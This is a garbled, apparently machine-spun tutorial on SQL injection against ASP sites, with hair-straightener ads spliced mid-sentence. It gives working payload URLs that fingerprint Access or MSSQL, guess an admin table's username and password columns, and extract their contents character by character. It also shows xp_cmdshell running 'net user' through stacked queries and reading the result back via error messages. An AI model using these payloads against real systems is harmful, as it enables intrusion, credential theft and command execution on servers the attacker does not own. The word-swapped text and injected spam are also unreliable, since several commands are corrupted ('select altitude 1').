acc injection:
ASP + acc hand into
http://zsb.xxx.edu.cn/2j.asp?id=24 and 1 = 1 to return to normal
http:// zsb.xxx.edu.cn/2j.asp? id = 24 and 1 = 2 returns the error
1 = 1 is a true, 1 = 2 is disloyal, it will be a return to a normal error.
SQL data will chance It’s about time:
select * from table where field = '24 '
or:
http://zsb.xxx.edu.cn/2j.asp? id = 24 and '1 '= '1'
http://zsb.xxx.edu.cn/2j.asp?id=24 and '1 '= '2'
into existence, and to determine the database is ACC alternatively the MSS, the use of system tables
ACCESS system table is msysobjects, and not in the WEB surroundings, access, and SQL-SERVER systems table sysobjects,
In the WEB environment, have access. For the following two statements:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count (*) from sysobjects)> 0
http://zsb.xxx.edu.cn/ 2j.asp? id = 24 and (select count (*) from msysobjects)> 0
If the database is SQL-SERVE,
GHD IV Pink Straighteners, is the first network pages, definite operating usually, the second is an exception; if the two ACCESS will be an exception. After we submitted two
are erratic, can make sure the ACC database.
Figure 3.
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count (*) from table name)> 0
exist if the table name will return to normal,
GHD, anti-page misdeed.
first I submitted:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count (*) from admin)> 0
returns one error, indicating ADMIN this table does not exist, when the afterward submitted the return to normal:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count (*) from article_admin)> 0 0
submitted:
http://zsb.xxx.edu.cn/2j.asp?id = 24 and (select count (username) from article_admin)> 0
returned to normal, and then submit:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select count (password) from article_admin)> 0
returned to normal,
GHD Midnight Gift Set 2011, indicating the subsistence of these 2 fields username and password name.
guess the user name and password length;
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select top 1 len (username) from article_admin) = 5
return to normal , indicating that the content length of username 5
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select altitude 1 len (password) from article_admin) = 16
normal, password content length of 16, which namely the MD5 amount.
surmise the contents of a consumer appoint and password:
http://zsb.xxx.edu.cn/2j.asp?id=24 and (select top 1 asc (mid (username, 1,
GHD Deluxe Midnight 2011,1)) from article_admin) = 97
returned to normal,
GHD MK4 Gold Straighteners, indicating namely the first username in the ASC content of the premier 97 yards, which is a.
second guess the username, 1,1 change the username, 2,1 on it.
guess the password into the username password to OKAY the
mssql injection: 1. Display bat execution reverberate.
sa permissions in the injection is not discern the mandate echo quite bitter thing while, in the Bamboo sibling nbsi there is also a meaningful venture to return, why ought try? Oh
Now I say a way to echo the perfect right to see and do not know Bamboo is used in anyone way brother oh
create table
statement: http://www.xxxxx.com/down/list.asp?id=1; establish table dirs (paths varchar (1000 ));--
Returns: normal message! Help construct the table success! Continue!
statement: http://www.xxxxx.com/down/list.asp?id=1; insert dirs exec master.dbo.xp_cmdshell 'net user'; -
Returns: normal information. Data should be written dirs normal
statement: http://www.xxxxx.com/down/list.asp?id=1 and 0 (select top 1 paths from dirs); -
Returns: Microsoft OLE DB Provider for SQL Server error 80040e07
will convert the varchar value'***' the column data type int grammar error occurred.
^ _ ^, so that we can see the results of echo, of lesson, the straight use of the contents of the table will be more violence nbsi rapid.
Similarly, additional extensions can also be accustom to recover the content this way Oh, such regread, (not tested)
2. xp_dirtree jot way problem
nbsi catalogue listing tools are not profitable, sometimes exhibit column does not bring ... to an end, really came out, oh, you can equitable tempest table file (the default is NB_TreeList_Tmp) to see the contents of.
3. detection loophole
nbsi vulnerability observation is lamentable, for book numeric symbols as he refused to test, not to say the percolate of the type of quotation marks, so it is suggested that manual testing, so guaranteed to be foolproof (: P)
4. erase xpsql70.dll and xp_cmdshell, and can not upload to solve the problem
Big Brother is actually a long period ago czy
have said, I remember a lzy seems to have said,
GHD IV Dark Straighteners, although, and this seems no the same
declare @ s int
exec sp_oacreate ; c: a.txt
this is executed in the Query Analyzer, instantly in the residence bar should also be executed favor this
declare @ s integer; exec sp_oacreate p>
not characteristic test by the injection point